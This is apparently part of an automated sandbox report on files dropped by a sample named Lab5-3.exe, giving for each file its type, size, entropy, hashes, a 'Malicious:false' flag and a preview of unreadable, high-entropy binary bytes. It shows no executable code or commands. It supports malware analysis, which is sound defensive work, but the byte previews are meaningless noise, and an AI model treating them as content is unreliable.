                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Z0tIVLWGmDp9CbboClQaD9gdmCv3ELFyeGJQ9MMHfUTid3hBaUoSGFcmeykEdEE+:NVLs/0boCr5Kv3pBJQ9MGx0uKeY2ElUJ
                                                                                                          MD5:80C62789DBDB9C0076AA921E580E391E
                                                                                                          SHA1:090218EE75DEE556F9E821582EF622DFCEA2D5ED
                                                                                                          SHA-256:69A3ED3AEAF99CE936012724C6861B6FA55BF55C1F7163B905A6D320E62E0228
                                                                                                          SHA-512:FD6C7BE5CF33CA7868F92CDDC58BAD8A17FCA6511E21D85C96366B81FD5BEC12D75297C7AD8D8806A788B418657A1DA602F5F9DE0483FDD1D5ACAFA6CB27AFC1
                                                                                                          Malicious:false
                                                                                                          Preview:........v.r.R$..M+.n...w.c........R.3E4g..;.Z2Eh5.\g.....Z.V.@...{H.gA(....P..N#..kz8nY.du..KI..."...g..Z.....76"....1.....5.h./,........j<.....W.9..P'9....A.B.u..g..9Q..dma.c.k.o~s..\-......Dy/Q..Zgm....Ce,.~.e...Q...?:^+.T.o.0...*!E..y.._H5.h.L....[.......6K..1..mM.?H.2...a>.$..N[.....$4O...2].^...MZ.{.. ..!.^......l.m...bS..gZ.E..na{...;...t.@.....L.....M3oE.g.Jh....M...4..e.8.,@..U..1h.......N.$.c..-..1.....Xe..=.=..).....;#"R.<q._ca!W0.........}...4:V...dZ.w....&.K.\^?YtPvl.16...J4.K.wy\2B...!I.`#J`.n...H..SX.*...7...6..;mY.b.1...'...A....eKHtg.o...?@.q.rw-O.~Ca....U.Vl._..A1.E`FxG...V.....fJ..P..c..R.F....C...6....:..W..L.....\rm)......6..<h>H.$...\.s.....%..H.C.}.....]..2.....k..8.zz@...x.'...^..5.l.`.o.....g=..K.......ZY......0..S'......&ezsE.f.'6g2..$..F....s(.^`.q.......*......c....o..:.S0zg..%.--Yy<w,?.Ra..B..$OF.....v..F.JC.q%.1.'BL...........f..R.'5 .>....A..Y..N..E......]..n.6)....c...[.L............x..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.926536842703176
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Dg38QiP9h/kiBHfUTid3hBaUoSGFcmeykEdEElU92i:jfPb/kiCGx0uKeY2ElUJ
                                                                                                          MD5:7E4A8C552707C0AE188E175245BDC5CD
                                                                                                          SHA1:1B84DF0499CA8E818CDB41AEDF62655D50DB442D
                                                                                                          SHA-256:B22DDDA8B8A5F84A778E293CF41A2E6B6A8B01017A4304B03F49730A79B86786
                                                                                                          SHA-512:EEED3A616E78417179227DA3110B628E612CFB482A3776DFAFC355D0B32F13CFF71F6B2C596A8049F9D587BC3E57BA46CF95BF4E8F5682D9328EB9EB3CEAB860
                                                                                                          Malicious:false
                                                                                                          Preview:...i......x...j....c.....nd...;b..p.@......l..*.9...u.{.....(......7;.5.........(..G..[...,....xFd.ZG..H.......o].M5...&../.K.5N..s9,:...w.Z.{,....O...Bh6gy&..`.0b........;..)(K.u.-%.>,<.....S......8%%X.0$..C.L.x...hL.}..-T..~...h1.riq.....d.e..K.Y~..^rPv{..\V,@..A..#2..t.w.].:..3...E.Mxo...ux.vq.......fm".dn^...j`....d/.....l.....Y0..=+c8%.'..?.x.......8&/..f#:.&...|y+}...O.wFy..G.........."...<...;.,xd........jM$ .'.b...A\..t...K.d..[vG)=...#.#U......%.S.Vx..1...E.D-8,B...US.@....'\ <....d..Q.t...+gs2...O.JO.d.......L.....o..,jX!v...)..k......7.w0........).!....z....y.8.#.C@.........!.`k..v..1<:...Rc8....Z8.2.....l.......y..J.~..].'.&.N...C.)=)......e.b.FX...8.b......xIM...,.n..J.....`.~.F\d.... 5.UM.m.Q.[..3..A\.M.5Uz.8J..*j..AW'......3B3..-/.<..Pa.....\.%L:.h...jHv.D2<.Q.~F...g..l.Zj;....0.#...5.k........|.#...d..q.U.~8.)....p..N..,o.w..*.f.. <.6g.l...C ........... agV.C.L.^.T.=..2....>.L.R....x....Mb.s.......:r[...+.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2880
                                                                                                          Entropy (8bit):7.934990653619806
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DktGJUezqmEgcO6QpKwN5fph0oQZObSURO1hHfUTid3hBaUoSGFcmeykEdEElU93:LNZn55hXbSUbGx0uKeY2ElUJ
                                                                                                          MD5:E5DA388908807A88ED3A6F0596383D04
                                                                                                          SHA1:85AEC0ED5B7AE00715F1C4FC9450C86785630806
                                                                                                          SHA-256:BF4338AEDC1091B1E751EFBD7FCDAFBE226A48A1A674FF4F132C30000A73068E
                                                                                                          SHA-512:7C02506CB44E25F02FBD0254FE8870432BC1EC7ADB34FBD6A76D3E42A67747A368C95BE2638B55171BB7CCC42279974E4C1283726D5BCF926D3CCA946B916FAF
                                                                                                          Malicious:false
                                                                                                          Preview:1..s.....Q.T...;.$..3.W.IO...T!".s:].JC......l.%....e.pk...v....T...$....q...]`S.#..=.?.Ws.J6S.6=.@].kA{.w.g...G./. .3*kW..Q. .Js..,..>.Z._...d...YP..o.....Q9.JE..8..{....Vw.iX.BEl.......Po.....^.V.z.1{..rA.DJ..6.+G....C-.-J.GJf.......t.......sPR2.|f..v..:...T...\fm..d..&r...U....U.....?U...<.......EL+..}..K.qy9...@*..).|....~>.e..{.{.>..&.2g....|b.....s.%..m..a..M.a;..].5.{....]%.z.j.)O..c..h:.M6.;............WkCgI...}4.Jca.!....@k2D.vr...x..m>ik..../...8X.W/.j.!.~B....gb|....O.._.|x.,.&#...3.?...Z....<....9..80...OW.<...9....B..........s...'s....Jg....Z...mf]E....._3..g..4..).3q.....q..C.>..l...X..`.....sd.....|:>%.......V.[.0...X...l...T..}M....?.J.F.}1w9..f.u...._;r&2...w...B....c..V...t..W....u.......5.MG({......i..K..v5...cy.W....<)Q'>6....d..e..,.......j..y..z..oQ..Fcji.......<..G.A.LJ..?S../>.^z<.}>.....b.1f.9..T..P.\.F...F.n..x...Y...F.....h...;F~;H..s.iY..O...P...'.t..d...@.Av.k8.-.l.H.6.|n..6......)o...|v.b....7]rj]1..@4SP
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM, 0x8C-variant)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.9383178334466225
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3lDJmCDYAlqYYHDSEvPIPF2gfHfUTid3hBaUoSGFcmeykEdEElU92i:3GCPlqTHD3dgkGx0uKeY2ElUJ
                                                                                                          MD5:6FA392879BD16493A7CCEAFD58DB095A
                                                                                                          SHA1:38F973F6C36C0C03F42912728EAA89EBEE51ED89
                                                                                                          SHA-256:87C9F886E9D5FE5C50B87D1EC7A2E75FD9784ADB4C15668274CBBD0A76CA8EA5
                                                                                                          SHA-512:2340531E01BF0EB7620BC87E9A094160250DC40B7A5F1A31CD053BB35FDD14A29A6E97625F79F576A54AE7AF8A85BC18642DB14A3759978B9F441FC5DB882A03
                                                                                                          Malicious:false
                                                                                                          Preview:.....;FT[l.....1.....8..8.ch.3...N.)k..+.....9D.g'..\....O..\A`j...c..... .S...>.......C.N.Y...:...).x.....Sv+k..Aq@.$....=n..@0G{...+.......h+...a.Y..._..3J...!..X.....5..f....{..U.W.....v.h....Y.~0P"o.\...d.......w)..[>..s6.75.v{...~...M...d...B.......u.6..8..R19.........H.o{......ww...?$...km....$Z.....$.....D}M.>....a<-.Z!.qe.._s...sCUI.f.a....J...../'....41.}..$[...<...=.J4.z..U.cO!....p.q....g.y.~S.....<&OO7..V..1]7.y..I#.....b...n....?..c.......... .E>...|.~...E.3."<...._.)2&.9#...3..MI......f..2...y....._.v....q...dp(.b0j......{R.J...[S..PNzm.E.gq.(.-..P...G.I.....S.. ...Sb.T..\S}..........6/......{.7....g.jb.....E9..O.~)q.l.V...;..9!.o1.C....\..vt.].....?....4..+IX@P.~..h#..t+f.?...6....oS........V>...\~...R.P.q@..^...4..U8.MJ....c.......>M.\W&.y.%.+...f.Qh..=....>~I(..Ja..'\.s<..\._`..E..3.[4..T9.*..0H......C.&..N=z....7.<..-..M....n/W....7.Y_.q...8..Qey...... h...}.........{.m...`cc/..-.!.I_.N"`.CO..8.....B..."..n..4t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2896
                                                                                                          Entropy (8bit):7.935742056012455
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8FKCOD2yiOb1jWMpgOLGpVOLptkAqUn4lcaHfUTid3hBaUoSGFcmeykEdEElU92i:8FKCOD2yiMjWwg7pVwptkXcX1Gx0uKeR
                                                                                                          MD5:92CC011262A9A1B09ACB3CFFD624C03F
                                                                                                          SHA1:BF3BC015B384EDE7167C0ED2E28CA3722ED4FF71
                                                                                                          SHA-256:11AC3590E877A02C4A09426BBC4081AA676AF889070BC2196072236B9D74E83C
                                                                                                          SHA-512:5D44A85ACAB692BF75101D56305037B543D3267731994EBB7DDF7908D71CE87E83596E10D4547917DAADC94140172F3599A9FCBAEEEA258B72C9F7544DE51D7A
                                                                                                          Malicious:false
                                                                                                          Preview:Tm3.g......S..#H..6.,RJ.........E`.U......x1x=d...de.."3}.?.+....#.`x<..4Y'kx..l.....Y.:.:.6.9|...m...2...0g.....(v..."Y`...........7..Z.X..^tr..{..m6`...#.`..S....LO......q.........e.T...,1..!......&......8..C..Z9..~.A.. 8s..W..t.TSB#<.P|F.o.L5.a..!.[...q.Bz.my.^50...h.#;L...B..c...z.R.i/}..@.&L....|......d>.&..*.:.h..E*m.B...._.V<..3...M@...vV...c..h.U....4...2.Y37..!.F....?....?...#pS..?...w..hL..;B...fN...Cw......1.5..s.....(a.#...(.<.....q;....ni.)..Z..+l..$...BC..3...O~x.X........g]h..d..Km.t...xj.L......gu...vu..,......c.........DK..3.....$.._.D.-....reqFV.{.....A.LO..<.z.~...f.(..'|......N9.w.U.......V.<".F63....8.].mm......iJw...#.|....&.D._SFK...-C.l.0..K.<.!..m>....K@.6..+U...V....g.:.._K..!...X...R..qO........c..}2 ..ac.2.."$..i[B......d..T..6z.4.)+9.6.<.......|UC.(6EB.. .z..@....(..+.K..{...v..I.K..z...P]...j.2.\......X.].R..F.;..C..o.`e....o.......M........TI.hb).O.?f.....Z.....9[q.=eS..;.....v.....D#h..LS.......?.u...A.=...c.5}
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.941394028326906
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xde/jaRuZbgJwVznWrEI89Ttvt7sX0jY6TPMV5HHfUTid3hBaUoSGFcmeykEdEE+:m/jacpgJwVznS589ZV7sEE6IV5sGx0ut
                                                                                                          MD5:9A1E3F9C320F0B73807446FFBD41B930
                                                                                                          SHA1:651416926D10A1BDD5BDE95E2C901414B431A507
                                                                                                          SHA-256:CEE3DFE3E4E2D21DEDBFCEB7046B7878C6683F6BA1ED500A5B8B719654E88D15
                                                                                                          SHA-512:52F47E14774038760D9C2E58243525280D2466BEF2F74A4BA8B30A679BCF409D9C6220D3BCEBF3568AA6BDF281536ED725869C3821DC6CFA2E4F4498AE259C63
                                                                                                          Malicious:false
                                                                                                          Preview:..h.Or....>F.S..-|.Li.p.v.....t1..Sz..<..vi_V..B.Le.....2G.,..L~.u." ..Y....T.>..u...L%./.Q"..Z....)!ix.R...uY..tC..T...r....:...F@D.hK.>m.....9.mN]..iJ..Wy1.fz.V..!.7.vQ.`.....\.......(R.k..t.+.U.r~...Z....k....*.VH.)h...7....jZ...`......e.}.j1.#m..f.......U.=..|...//"0.5`.053...rj...3v.7j.......t%...>x0^......p..?.,.......$.......)K...PAt..W..(........(..^...Qy).e8.pi%..k.Z.5..........k5....l.`...[$p.\.y<R.F...._N'y.-"....;..r:>.@.V.;,.U..?..lo..\..M..k...M.M.v.......H~5g.ot...2n.p1-oI....@_zQk.q....o.. ..*.:..*.\:..GN]......DEl82...~..i..7..T.B.h@...y^...d.5....XN..i.. t..`...<]...8.x......AM.<..'...:.PX..A.z...)x..{;..k~J...[.Ct@*&w.b,*iR#.EzD...>......#.\.x.f....YO..C....<;......x....k...].E2V.*R..Zj?....wU..I..\#......'.......A...R1uc.`..()b*@}.l$W.=$6._ ..)&.^HCK..m....z......a.H.x...T..KC4.n%Y_R.#..s...BL.I.....pq...C@.|vF.,.M...&..?......`.7.....P....}X.-.5.(z..g...{4(....n..A.f.......o./.....9......X.*.#7.bb....Z.^..O....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.945589771855668
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KNoQ2zRSPWicqcfIHwwFmGSr+TY/JuNKmYLP7HfUTid3hBaUoSGFcmeykEdEElUJ:woQ2zQPWicJfIHZ4ZRWleIGx0uKeY2E+
                                                                                                          MD5:F70F5B09F6F35F8B72A3F15A0EC99DA9
                                                                                                          SHA1:35860B7569E1FE8B2B3133565DC0D27C25AE9F65
                                                                                                          SHA-256:E5A50A4E4BFA62F539AF482039F993D90D030F5509951CC2C398FF75BC3B209A
                                                                                                          SHA-512:60F0F2E4258E14F9FAD8042BD6FB80AD4B0BAC9E4D21491AB9234B4667DD98BDB82DA2C7ECBCBE42A82B0159EF0350874A8DF795BFF56E1287FEB4291BAD9420
                                                                                                          Malicious:false
                                                                                                          Preview:.......}.W',m.....!.j..a.1#...>.G...>l.%.......os....+.-.i.m......h.e..+...$2[.y.^....E.P..WJO...*.VO.\..&.......nF?........t..J.g......F...+*..!yW.......K.)`.V......8.8&&....T.jA.GH`"bw..O.)+Bu?K..6..`......-.4z.%...A..8K..k,.Eq2d..o.*r.3.}.C_..;.....o....3.0|7.U.h.M&E..j..{.y..p..[...z.....=.z.8.?Y......eH*<.+"D.?Pl...1.s......(H..G..'.P......Z..U...p*.26.{,:"9g...............p.I.=.`.....1..:...G'...+....v...{ .k.. .^..).:..rt..w.%\. .g.........l.R.x."q..a...ngI..D...c..%.*.y..6.{EP..w/K.....95.@...HL.tA{n.AahCS..M.N..C}n.....)...u...b..#..yk.....m.......Po.3,.~.|......%[C....`.*.i-T..j..DM..."=.e8.f...b.>....1{ .B..`..n.F.....R....K;..B].?...%..w=......;6.....h.(F....WH.g..Ho......Z........Q......G..:.I.....^DB..&.T.@s=...0.n_.5....y.v^..1qW.,..of?.'ga..G5..e<..D.p..*.w._`#..%.lT.....<CbP..r.Qq..u.;+.#LS0.7....?...D.ZS.1..]}^...o.U........@."5....\JW..w.B.Tw.z.0h..d..\2..U*..`L...I ...0.9..1H...r...J...?^..]...|LOXg2(.p&..B@.;.X........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.941243225687297
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:NQ7gTUHh/WWEhScTvKo4Fmqj2TrhDSqjoHfUTid3hBaUoSGFcmeykEdEElU92i:NQ7g4YWEM8X4FJ87Gx0uKeY2ElUJ
                                                                                                          MD5:8C1923CE96CDBFEBE9D4655F920A6A7B
                                                                                                          SHA1:396B4F5CAA3265F683DBE400B4A615E8C9390FAD
                                                                                                          SHA-256:6BBBBAA0F6A86D6ED41B145C16146A2E38A1B3E1BE1FECC4564625049727C15B
                                                                                                          SHA-512:3EE2441F11633C020C1B7C088A28BFCA094F2D2943C3CA443BAAAF0CC2469E73D76CAA5AD34DD9BA398D5F57996A1412E01A56A822909976A50E39D89B4410D9
                                                                                                          Malicious:false
                                                                                                          Preview:..1..- =..8..5..E.x.u&.xH.O,..Y......l.#$M..z..cz.\.(.J.............*.f(..]P.X....q..?..i<.sQ..5.v...&.dKg.~y..K2. ....:.)<......'.K...QR..5C.).....T.H.2.S.oH..Q...Z.z.v..X.Y.P<.q.[.......`I.)aY..=......h...::g7`.~.....4.!D.o.%To88........w.U...e..g...:p_......q..=$?..J).\...B... C.`.E...P.....%.&m..d.......=.s6.g.c.Uw.ce.{.)k.4?..qc..24...^..B.|2..M2.5.S.....IGst..QE....eq......,.p......T.7......d.S....M..0r....o.ej..=...%...z}P........L.......JV}...w.n.z.7K......j..U6......W.T.\...&9.().".rLpD.....Q3.m~.M....... z...q@.,3.O.X[s..[N'....Z'.\2._;...9.....f..@..e..Yd4d.a.>.b.....\.n.~....^....>E}.,.=..@C.....h{....Z......y.....vT..._m..W......Ea(.......2^D`..?.a..z.6H...k...;.0...r..IW..e.~.V)9...,...".....N..^...$........N.N.N.(k...u..t....*.$.9.....P...C.6...*.1.YQ..:x..`{..e.8.....u.IY....R.l[..wrt..%.......;.+..kB.S...]>..@=.P....x....e.......Y....W...>>..l%.&q.,..=.T.a...+].M.<i./{.G.pQ>.....Ip..).gU....O.c...k..:..t.,l..#..9.B.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.9332736781340225
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dhVD6tTWAZURDna+kAGK99EeeZ+WUZA9HfUTid3hBaUoSGFcmeykEdEElU92i:7VrAyRDnadlKTJe4Gx0uKeY2ElUJ
                                                                                                          MD5:D3346C158FD340156816162799260C1F
                                                                                                          SHA1:2A634B68446A4468952D9497A65F0EB4711E8FEA
                                                                                                          SHA-256:02359DA080B0885D5B2C1C051131E8076501EC8B86C1F10C5DB52A38ABF23E85
                                                                                                          SHA-512:216BDF79132697568CAC98BC4935B1A1AA2A051B307862E0B966A966D98F8D861739E6C469521CD1FF1217ADD47EC619F1669A51BE25FE93440D63BA9448DF38
                                                                                                          Malicious:false
                                                                                                          Preview:R.,.5......h.zbf<.0A@M.\........A3).......J.5..<.]....<.......Z..h...8#.]j..kwgBR.......%.L.9n94..eY."....5.........<..E......+.w..+......yF.E.....KJ'.F..*8KXz...HS.?..A.j.....&....WX.p...L!.A..8d.^...`....ey.81.q'y..$.1>.'..V....M."V^..y.Gr..dk.........D'.+*.nE;..T..5.5.7.y.....{.m....4Y.y.G...0l........^A.k+r.DM.u.lh.....;...,R)jc..u8.......>....K...cA.. n.Y.....?...y..Y.'.Y.P..Fwc..qxd.....+YBt.....+w~.2..t.$.t5..^...5.{...(N.M.6.7.c..oH.C.......g./.b@.'....[@...[$_D.....~;.m.p.w..8/... e..u..~.'.S/_....SJ..DYY.X.j...I.P1/...Hg.=..|.._.`o..r...R.............s...K..;.R....x,..B..+......m....L..6.(y|.../....p..D...d.z...t...R....{(`kb..P..f..a..h#2..n..P...m#t...^6...>.E...y..............<Ii...j.............8..9+;?Z..ZR..ou..-.~.....S0ag3.P..D.r_wlqr..d.,..V....Z..'.4{m.9C..d.A.b.u[Hq..FB".%.+..a>..T ....l..... ....F.~.....m@Z..O.a]......H>..E..#.B..jv....o*.-N..y..&..C..XMXis.&)..8Z.c<.9....Zq....~e..i.N.*......H.D.D.:GV.3IF...Zi."..K...p..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2912
                                                                                                          Entropy (8bit):7.941961007550366
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:G0XZB/8eCgykDnxczk8i61/BoPSPdZuH5hPTSAHZdHfUTid3hBaUoSGFcmeykEdM:bB/vJ5bxcgh+oGdIHzWA52Gx0uKeY2E+
                                                                                                          MD5:8811BC4C763F825503470E871EF5C963
                                                                                                          SHA1:F521A55E4AE0900D663EB1D87AF8C6ABD304C71D
                                                                                                          SHA-256:D4981CC925F7CB4859514B846E5DFE0652024AEC0A18738370C90F4CD66D00C4
                                                                                                          SHA-512:6353DFA7E1EA3ACA032960563085302BE93BEC831366DABB8CF88BCD73A8028E380C2125499DCF13FBC086E155AB5BC80525AE7BA6D23B6FD6BC80DB338F3E04
                                                                                                          Malicious:false
                                                                                                          Preview:..-z..\`.2.gJ.4..Y..B".>_q.......V..3.\..MR.".`....mr....e.>@T....z..I..~....... ......1.K|._/./...^b.e...F..Y......G.d.T.}.......M.Q.........3..*....m..........U..).,.g..%Y..+....Sa~..[]Z'g6.L...J...|.i@....(^.........3.tw@.>...1o<.FX.U..ls.5u?..(....O.q.%.,...5..nd.C...L.../{.......-.p.[qz.....D....-.j|.~|...K...W.........)....af....@l.........k...+\...9...f0x".... ..>m.?..)!.G|.-..<..k.. .H..}`...B.Kj...Tu.s]..~9.R P....L.....R..9.'..o.S..L{*2...\G$.$das.g..y..F.bV...<Y.......^0CG.....W... H............:gG&..v.1..:..../$..z.RI.A..4.,-.mDm....B!.v.2TWO..qG.fr.3O.4;..=s..A.{_.Z.....+w.7......]..'...5RV..7 3Ola.....^c.>...yB..~......-Z.."..._m.k..5lU..5.N.V....A..0.<..|!.....e.?9.k...<.^......E.w,`..{.;Z7..#.(-.}Wt.d&.C..`.../~....d!.....:....E..c.T.....'.Ir......s..RY....C..2....0..b.T_BGN.k....{5`..a..!..J.p....J=...G....GR.{.....M..`%.E....zj.'o;.o.n.. Y...".'...Q..]...M.P.o;...m..x...3F..dj...,.de.C\.N0a........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2912
                                                                                                          Entropy (8bit):7.935766925924028
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Gfz7ylIoBzdH6nCM2Wl62iDJJByt033NyKJHfUTid3hBaUoSGFcmeykEdEElU92i:K7IpH6nl2gZixytcN9KGx0uKeY2ElUJ
                                                                                                          MD5:1CAAB30C6462BA90119C794E94C3CAD8
                                                                                                          SHA1:3EAEA7063EB30124713B438A5C1848011E5307EE
                                                                                                          SHA-256:E48FD4A8969A0021B9D8593800088228CF39AE4FD3E6F88236385436A35586DE
                                                                                                          SHA-512:93718F61E3AC784A61C922DC61D33A1CF3E3D5BB1DE43A0EB4864AF11C3AE438E30BECC8B29F28C104304683BC5EB91DF01290D88CC8C91A16AE6D92176A1846
                                                                                                          Malicious:false
                                                                                                          Preview:.xr`....b{...P......r.Z....-.*:.}w.."\.......p.Fy.;L.....+..)....9 t..q.r.F.T.;U!....D._./!l..pt.$..V5....5._S...u.v....xv....v...q.....\...o.~.o.. ..:..5A5Bc....L.;'...s..:.\?..R.D...kX..*...J..NXw.m..l.1.._x.o..X*.!.....+n"..O.XL.M.LM......[..b......:...ew.T..<.ip;U..G..[...0yk)(./"a.."?../.;/g..G.m....|@...,kkc....=..A{..._XR..M(.W.>&1.*9...x.3x.Q7....a...O,.Bo.p.n.tq.h..I...m)._'...5....).i..X....x.S.{!.n.5<.....E...... |X.=R..J.g.?W.o/FB?.&]l."..9..A..j+.5p..I.._.4'.IlA.c(.........o..&.....8....h/E..p.\]N.w...R;]..lOa iXa.>...2..^o_.T.9\..v.y.,V..@.=.....3$..Lu...}CK..t+1..v..Y.R.2.vI...!.....Z.s>.....s.%..f.]G...B).&..I...+.r.&.q...t@B.D.w.By..&^...Z...l.X......_.C.!.p!...5c...=a....(...."....l;.Cz.bX....T.V.:......-S...o.'.8]s1.{..`...#.>pMx.....N.8{eH._...V.tY....L/?....mG.3.(W.[).@.[G:....................@...13....._Ckr)"....;2N..Sa.......s.R..l$...:.....-..u..)..G.g.U..u|.<.l....T.,@.oS}._..48v.6...3h;5{.x>..52H.0..BRF-J...4.mte$N..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2992
                                                                                                          Entropy (8bit):7.938508220666663
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xQ9HX7pO8SDgVc9tuVVP8kAT/MyNB11Etps+BQlS0/D9eO1qvHfUTid3hBaUoSG0:xwXY86aVpCLvhmA379eWGx0uKeY2ElUJ
                                                                                                          MD5:09439DE86DE43DA61FE383FE086EF9C1
                                                                                                          SHA1:53F44FBA32AEA5BB21E60944286F07CED0CBDEBC
                                                                                                          SHA-256:A0F310E99045D827BB63900029DCDA57FC705AFE5B0FD1FF6970B983F3A03E5F
                                                                                                          SHA-512:989461D02B6B1F50EC5E0FFDFB4333B24CAAAE588509A735BC0C9DAE337C3610005BF6AFF500EF5E4615DCB8B7AEB704CC5F5A4D1B1325D335D0A8B8D5E85BE4
                                                                                                          Malicious:false
                                                                                                          Preview:....jL.W....2&....Poj...#......%..Z.....T4 v.W=qM.e./.5dz..@xuYb.4N..%....~.|;..u...K.n.....9..!.Q..3C...D...G...{...<.....u.}...T.9.Z..X...1{..y*.}J...;...=..<Y.H(....sW.DR...7[h...j...}..N..N.D...JX.A.xH..*f...~Mo.Q....E...Z.^...}oPm.&.yU.0a...}...._<...eE..C...wX........t...._...B./Lw....6&4@..S#%q- .KCY8..),..VKga.%I.OM.{.Ym..........x.6o.>.s...H#.L...j.>.R.Z........J...S..mck.............N.....>.<...P!/...$.~n...!p*...1..../(>#.....7..5.PeR./`.{;t...H.PQ.a.*...i.Mh....F.O.kp%j.{.,....=..k....$03...ev...i.K..|..y/.;L..ZmX.C.Q...o.....L]kn..}&.....()$.lh.^.g.~..Q.\.Z. ..5..h..hT>...Xe..x........:$.%..Lo..%[5...j.......\.....+$1.XRB.a.0.Y..W...~....ul.)X..m_.u..S..K..F1y..l....j......V.$J(....*].V.".Z.q........C?....Z..D[V.=<.=.Jm..6.....tl^.=.zf ....0V.4.,'...o".2..l7.RC....T...._f\.x...N..U4yF...C..Y3p......88g...).../....]P..l.1[..../'2*.l65...v[.msN*.........0....?x.%.,{.O.0!F$.X.4.5..Y..7..3.B....".ii..O..r*VJ%..Kw>:.@...b
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.936541168945603
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8GBSZScG3vAqAKA/ckDWe3jQ6xVpcV1HfUTid3hBaUoSGFcmeykEdEElU92i:XBSZMfVA/ckl3x3cVOGx0uKeY2ElUJ
                                                                                                          MD5:4678CDACD7C73C5815C1E5B279E29848
                                                                                                          SHA1:0E9908537F26D3E248671511D3C9B31753261560
                                                                                                          SHA-256:C9D13A35D02A7D59F62043852B397F0C971C77A29D990DE21C08D522B5E919BA
                                                                                                          SHA-512:F29CD0B2BA1077E2AF68A9F1F2FEF03CFD80254AE5DEF3AADD27780ED8A624A6871E70706655310074B9536F8AE67D8E949A3793C5360AF5C5446CE49F30D93B
                                                                                                          Malicious:false
                                                                                                          Preview:..z...e.....JA.D.......x.2{....n...H..........'|...7.m}?dA\..E....i;!.ZL.b...@O..7o.,4<>.j.2{........B... v.#.Gky.y..>....tR..ob.....O./...T.b..dsG......_..P......,.....&#.pO.{................0x...U......2..*. ,..r....A..!.%W.....%/..iG.`m..<.?\1YA..lT.8.FMC....*...\...V..u=e"..SSg..0.......]t...y.u$ <.q.q..cJ..?.Y...w...0Em_H..4J.....&..... |7'...*I......t...CRuK........o)^....t..C.'..bc..:..bc:..I...l..d..0...d.....d...m...EI.gzB.. <.........9s.!..*.......b...=..8.z........b....=...Q...%2|z..Xp"#......J...$.W.).>.|.D:....}..>".......} o3....P.....5.C=...}p.._#..c.....rJ...r....!,0..&.+s...6g[$!.@.........j.{.%J...Gj..*...x......'.... ......Xs..L.../.++..W=.{...9...A.:..F.....,u...L..=#%....=..#..&...&.J..3.t..>H.1.~..q.=..(.f!s.....V....{nx..P.?..=|}t}L.=\....f....Wk.$g.........lV.~ZE.[L.....$ ..5f...F....!.=#..vZ..eXT..$B3.E....P...#t..`...s...dt..N...`..X.l$6.........GR#C.....@.,.BiSx. J.a...Y..._.I-.zu."......A..e.:Hw..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2896
                                                                                                          Entropy (8bit):7.9426848278642375
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:30E0Pdpv1PZtM9WdyWND5jrRN4ObSpEOHfUTid3hBaUoSGFcmeykEdEElU92i:3iDNPZv86RLGEhGx0uKeY2ElUJ
                                                                                                          MD5:9DF470A3BB80EAD8804530FA0C6839D8
                                                                                                          SHA1:9925007EFD2852C89277363CDF8DEB6AFFE61AE5
                                                                                                          SHA-256:C1D95E777A826826403AD4C8800BF531830CE9720C51D6E0F74B76A6E9E750D7
                                                                                                          SHA-512:A8981EE80E2619BFF8BF75BBC336E9A4F550A4FE4472BB75F19841BBB0CE88F264DE1EA6A232FE0AFA134786C498930CF11CEA02F15CB3121082E5F80110B621
                                                                                                          Malicious:false
